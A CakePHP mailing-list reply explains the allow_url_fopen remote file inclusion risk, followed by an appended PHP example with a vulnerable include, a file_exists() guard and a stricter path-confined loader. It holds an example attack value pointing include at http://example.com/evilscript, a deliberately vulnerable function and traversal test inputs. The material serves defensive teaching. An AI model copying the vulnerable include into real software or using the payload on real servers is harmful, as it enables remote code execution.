You should read up on allow_url_fopen, and the *huge* security risk it poses if you're not careful. You should never use any filesystem functions on remote resources, especially if you don't control them.
Thanks for pointing this out, nate! In case there are others who didn't know about this either, I just looked it up:

The security risk is that having allow_url_fopen on also applies to 'include' and 'require'. For example, in a situation where you'd have register_globals and allow_url_fopen on, and this type of code:

```php
include $somefile;
```

Then an attacker could run any code on your server by calling the page with 'somefile=http://example.com/evilscript'. This is obviously an extreme case, but more subtle attacks could be done on the same principle.

I thought I'd point out that Cake is quite safe in this regard - while it does use 'include' with variables (obviously, since it loads the files associated with models/etc.), it does so in a safe way by checking if the file is truly a file with file_exists first (url_fopen does not apply to file_exists). For instance in loadModel:

```php
if (file_exists($path . $name . '.php')) {
    require($path . $name . '.php');
    // .........
}
```

But you never know how code evolves over time - and since it's a risk, it is best to have allow_url_fopen off.

Sorry for the bad advice :(

Anselm

You received this message because you are subscribed to the Google Groups "Cake PHP" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to [EMAIL PROTECTED]
For more options, visit this group at http://groups.google.com/group/cake-php?hl=en
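The following is an added example, not CakePHP's code or anything from the thread above. It puts the vulnerable `include $somefile` next to the `file_exists()` guard Anselm describes, and then goes one step beyond the thread with a stricter loader that confines the resolved path to the model directory, because `file_exists()` alone still accepts local traversal such as `$name = '../../uploads/evil'`. The `$modelDir` argument, the `load_*` function names and the temporary directory used for the demo are assumptions for illustration. Two facts a practitioner should know that post-date the thread: since PHP 5.2.0 inclusion of URLs is governed by the separate `allow_url_include` setting (off by default), and `register_globals` was removed in PHP 5.4, so the exact `register_globals` scenario no longer applies to current PHP, although the same attack works whenever a request-controlled value reaches `include`.

```php
<?php
// Added example, not CakePHP code. Demonstrates remote file inclusion through
// a request-controlled include and two levels of mitigation.

// VULNERABLE: with a request-controlled $somefile and URL inclusion enabled
// (allow_url_fopen on PHP < 5.2, allow_url_include on PHP >= 5.2),
// ?somefile=http://example.com/evilscript fetches and executes remote code.
function load_unsafe($somefile)
{
    include $somefile;
}

// The guard described in the thread: file_exists() does not understand the
// http:// wrapper, so a remote URL fails the check and is never included.
// It does NOT stop a local path such as '../../uploads/evil'.
function load_with_exists_check($path, $name)
{
    if (file_exists($path . $name . '.php')) {
        require($path . $name . '.php');
        return true;
    }
    return false;
}

// Stricter loader (added here, not the thread's code): only a bare identifier
// is accepted, and the resolved path must stay inside $modelDir (assumed
// directory), which blocks both remote URLs and local directory traversal.
function load_confined($modelDir, $name)
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $name)) {
        return false;
    }
    $base = realpath($modelDir);
    $file = realpath($modelDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $file === false) {
        return false;
    }
    // realpath() has resolved any '..' components; require a prefix match.
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    require_once $file;
    return true;
}

// Demo on a constructed temporary model directory (assumed layout).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/Post.php', "<?php echo \"Post model loaded\\n\";\n");
file_put_contents($dir . '/Comment.php', "<?php echo \"Comment model loaded\\n\";\n");

// Legitimate name passes the file_exists() guard.
var_dump(load_with_exists_check($dir . '/', 'Post'));
// Remote URL fails it: file_exists() returns false for http:// targets.
var_dump(load_with_exists_check('', 'http://example.com/evilscript'));
// Traversal attempt is rejected by the confined loader before any file access.
var_dump(load_confined($dir, '../Post'));
// Remote URL is rejected by the identifier whitelist.
var_dump(load_confined($dir, 'http://example.com/evilscript'));
// Legitimate name loads from inside $modelDir.
var_dump(load_confined($dir, 'Comment'));

// Clean up the constructed directory.
unlink($dir . '/Post.php');
unlink($dir . '/Comment.php');
rmdir($dir);
```

Run it with `php rfi_demo.php`; the first and last calls print the model's message and `bool(true)`, the three hostile inputs print `bool(false)` without touching any file. The confinement check compares against `realpath()` output rather than the raw string so that symlinks and `..` segments are resolved before the prefix test, and the trailing `DIRECTORY_SEPARATOR` on the base prevents a sibling directory such as `models_evil` from matching `models`.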
